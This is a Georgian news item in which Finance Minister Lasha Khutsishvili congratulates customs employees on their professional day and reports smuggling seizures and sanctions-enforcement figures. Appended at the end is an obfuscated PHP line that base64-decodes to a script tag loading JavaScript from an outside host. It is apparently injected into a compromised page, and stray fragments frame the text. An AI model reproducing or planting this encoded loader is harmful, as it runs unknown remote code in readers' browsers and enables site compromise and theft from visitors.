celsiusi
ავერსი საქკაბელი

 20 სექტემბერს, საბაჟო დეპარტამენტის თანამშრომელებს პროფესიული დღე მიულოცა ფინანსთა მინისტრმა, ლაშა ხუციშვილმა.

„ძვირფასო კოლეგებო, წელს უკვე მეორედ აღინიშნება საბაჟო დეპარტამენტის თანამშრომელთა პროფესიული დღე. მსურს, თითოეულ თქვენგანს გულითადად მივულოცო ეს თარიღი და ვუსურვო წარმატებები ჩვენი ქვეყნის ეკონომიკური უსაფრთხოებისა და ბიზნესგარემოს ხელშეწყობისკენ მიმართულ საქმიანობაში.

ეროვნულ დონეზე საბაჟო დეპარტამენტის თანამშრომელთა პროფესიული დღის 20 სექტემბერს დაწესება, უკავშირდება საქართველოს პირველი დემოკრატიული რესპუბლიკის პერიოდს, როდესაც ეროვნულმა საბჭომ 1918 წლის 30 აგვისტოს მიიღო კანონი „საბაჟო დაწესებულებათა მოწყობის შესახებ“, რომელიც ძალაში შევიდა იმავე წლის 20 სექტემბერს და ამ დღიდან ფუნქციონირება დაიწყო დამოუკიდებელი საქართველოს საბაჟო ორგანომ.

დღეს, თანამედროვე საქართველოს საბაჟოს ფუნქციაა, ქვეყნის საბაჟო საზღვარზე გადაადგილებული საქონლის, სატრანსპორტო საშუალებებისა და ფიზიკური პირების საბაჟო კონტროლი, მართლსაწინააღმდეგო ქმედებების გამოვლენა, პრევენცია და აღკვეთა, განსაკუთრებით მაშინ, როდესაც მითითებული ქმედებები დაკავშირებულია ისეთ საქონელთან, როგორიცაა: ნარკოტიკი, იარაღი, ნაღდი ფული, ორმაგი დანიშნულების საქონელი, მომწამლავი და ფეთქებადი ნივთიერებები, სხვა აკრძალული ან შეზღუდვას დაქვემდებარებული საქონელი.

საბაჟო კონტროლის შედეგად, ბოლო ერთი წლის განმავლობაში ჩვენი მებაჟე-ოფიცრების მიერ გამოვლინდა  და აღიკვეთა 62 482 სამართალდარღვევის ფაქტი, რომელთა შორის იყო ნარკოტიკული/ფსიქოტროპული საშუალებები, არადეკლარირებული ძვირფასეულობა და ძვირფასი/ნახევრად ძვირფასი ქვები, იარაღი და საბრძოლო მასალები, არადეკლარირებული სიგარეტი და სხვა.

ამ მიმართულებით, ჩვენი საბაჟო აქტიურად თანამშრომლობს კოლეგა უწყებებთან, რისთვისაც ვსარგებლობ შესაძლებლობით და მადლობას ვუხდი მათ პარტნიორობისთვის.

საბაჟოს მუშაობის შეფასებისას, ბუნებრივია, გვერდს ვერ ავუვლი საერთაშორისო სანქციების აღსრულების ნაწილში ბოლო წლებში გადადგმულ ნაბიჯებს.

საერთაშორისო სანქციების დაწესების პირველივე დღეებიდან საბაჟო დეპარტამენტში შექმნილია შესაბამისი სამუშაო ჯგუფი, რომელიც კომპეტენციის ფარგლებში კოორდინაციას უწევს საბაჟო ფორმალობების განხორციელების პროცესში, სანქცირებული ობიექტის იდენტიფიცირების შემთხვევაში საქონლის/სატრანსპორტო საშუალების/პირების საქართველოს ტერიტორიაზე შემოსვლის/ტერიტორიიდან გასვლის აღკვეთისა და თავიდან აცილების  ღონისძიებებს. აღნიშნულ პერიოდში შეიქმნა ახალი ერთიანი რისკის პროფილები, რომლის საფუძველზეც ოპერატიულად იდენტიფიცირდება და მკაცრად კონტროლდება ეკონომიკური სანქციების მონაწილე, სხვა სახელმწიფოების მიერ დაწესებული შემზღუდავი რეგულაციებით გათვალისწინებული სანქცირებული საქონლის ექსპორტისა და რეექსპორტის, ასევე ტრანზიტის ოპერაციები.

სანქციების აღსრულების ფარგლებში მიღებულ იქნა საბაჟო ოპერაციაზე უარის თქმის და საქონლის გამომგზავნ ქვეყანაში გაბრუნების 2053 გადაწყვეტილება. ამასთან, იმპორტიორთა/ექსპორტიორთა ზეპირ/წერილობით მოთხოვნებზე, 1300-ზე მეტ შემთხვევაში, გამოიცა იმპორტზე/ექსპორტზე უარის თქმის შესახებ გადაწყვეტილება. 

სანქციების აღსრულების მხარდაჭერის პროცესში, საბაჟო დეპარტამენტი მუდმივ კოორდინაციაშია პარტნიორ ქვეყნებთან და მიმდინარეობს ინფორმაციის გაცვლა ოპერატიულ რეჟიმში. აღსანიშნავია, რომ საბაჟოს მუშაობა ამ მიმართულებით აღიარებულია ყველა პარტნიორი ქვეყნის მიერ უმაღლეს დონეზე.

ეს შედეგები ადასტურებს საბაჟო დეპარტამენტის თანამშრომელთა დამოკიდებულებას პროფესიული საქმიანობისადმი. კიდევ ერთხელ, გილოცავთ მებაჟის დღეს და გისურვებთ წარმატებებს!“, - აღნიშნავს ფინანსთა მინისტრი ლაშა ხუციშვილი Facebook-ის ოფიციალურ გვერდზე გამოქვეყნებულ მისალოც წერილში.

86
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");